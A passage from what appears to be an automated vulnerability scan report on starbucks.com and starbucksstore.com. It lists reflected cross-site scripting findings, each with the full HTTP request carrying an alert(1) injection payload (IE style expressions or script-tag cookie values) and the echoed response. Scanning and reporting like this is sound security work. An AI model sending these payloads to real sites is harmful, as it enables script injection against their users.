Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:40 GMT
Connection: close
Content-Length: 40761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?c6282"style="x:expression(alert(1))"6302ba5a92f=1"/>
...[SNIP]...

3.37. http://www.starbucks.com/search [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97134"style%3d"x%3aexpression(alert(1))"eb377b674b2 was submitted in the keywords parameter. This input was echoed as 97134"style="x:expression(alert(1))"eb377b674b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%2797134"style%3d"x%3aexpression(alert(1))"eb377b674b2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:24:22 GMT
Content-Length: 33897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2"/>
...[SNIP]...

3.38. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fd7"style="x:expression(alert(1))"61073b145fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27&61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:39 GMT
Content-Length: 33815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1"/>
...[SNIP]...

3.39. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"style%3d"x%3aexpression(alert(1))"ef582612840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68c58"style="x:expression(alert(1))"ef582612840 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /whats-new?68c58"style%3d"x%3aexpression(alert(1))"ef582612840=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:19 GMT
Connection: close
Content-Length: 44105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/whats-new?68c58"style="x:expression(alert(1))"ef582612840=1"/>
...[SNIP]...

3.40. http://www.starbucksstore.com/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94486</script><script>alert(1)</script>44201d6d60c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB94486</script><script>alert(1)</script>44201d6d60c;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:38 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTB94486</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>44201D6D60C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.41. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /GuestAssist/poweredbycooking.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7108a</script><script>alert(1)</script>5486b3db851 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GuestAssist/poweredbycooking.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB7108a</script><script>alert(1)</script>5486b3db851;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14241
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:42 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
weredbycooking.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/poweredbycooking.asp"
   var s_prop3="SBPTPAHP1SHTB7108A</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>5486B3DB851"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/poweredbycooking.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.42. http://www.starbucksstore.com/StarbucksCard/default.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /StarbucksCard/default.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902c6</script><script>alert(1)</script>c645460f9b8 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /StarbucksCard/default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB902c6</script><script>alert(1)</script>c645460f9b8;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19859
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:44 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
rbucks Card HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Card HomePage"
   var s_prop3="SBPTPAHP1SHTB902C6</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C645460F9B8"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbuckscard/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.43. http://www.starbucksstore.com/Tours/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /Tours/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eafb</script><script>alert(1)</script>892117031bf was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6eafb</script><script>alert(1)</script>892117031bf;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:58 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
e="Starbucks Tours Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Tours Page"
   var s_prop3="SBPTPAHP1SHTB6EAFB</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>892117031BF"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-tours/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaig
...[SNIP]...

3.44. http://www.starbucksstore.com/aff/adredir.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ee24</script><script>alert(1)</script>86a7be884f9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6ee24</script><script>alert(1)</script>86a7be884f9;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29740
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:50 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>
       <title>Coffee at Starbucks Store</title>
       <meta name="description" content="Shop for Coffee at Starbucks Store">
       <meta name="keywords" content="Coffee, Sta
...[SNIP]...
s_pageName="Coffee HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Coffee HomePage"
   var s_prop3="SBPTPAHP1SHTB6EE24</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>86A7BE884F9"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee/default.asp?CCAID=SBPTPAHP1SHCO&Redir=/coffee/"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables
...[SNIP]...

3.45. http://www.starbucksstore.com/coffee [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea760</script><script>alert(1)</script>6b70b264755 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBea760</script><script>alert(1)</script>6b70b264755;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29705
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:52 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>
       <title>Coffee at Starbucks Store</title>
       <meta name="description" content="Shop for Coffee at Starbucks Store">
       <meta name="keywords" content="Coffee, Sta
...[SNIP]...
s_pageName="Coffee HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Coffee HomePage"
   var s_prop3="SBPTPAHP1SHTBEA760</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6B70B264755"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_sta
...[SNIP]...

3.46. http://www.starbucksstore.com/coffee-machines [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c32</script><script>alert(1)</script>953da364365 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee-machines HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB76c32</script><script>alert(1)</script>953da364365;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21134
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:59 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
eName="Equipment Homepage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Equipment Homepage"
   var s_prop3="SBPTPAHP1SHTB76C32</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>953DA364365"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee-machines/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.47. http://www.starbucksstore.com/coffee-machines/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da449</script><script>alert(1)</script>9e10653ba75 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee-machines/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBda449</script><script>alert(1)</script>9e10653ba75;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21134
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:23 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
eName="Equipment Homepage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Equipment Homepage"
   var s_prop3="SBPTPAHP1SHTBDA449</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9E10653BA75"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee-machines/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.48. http://www.starbucksstore.com/default.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8163c</script><script>alert(1)</script>ec3893ac889 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
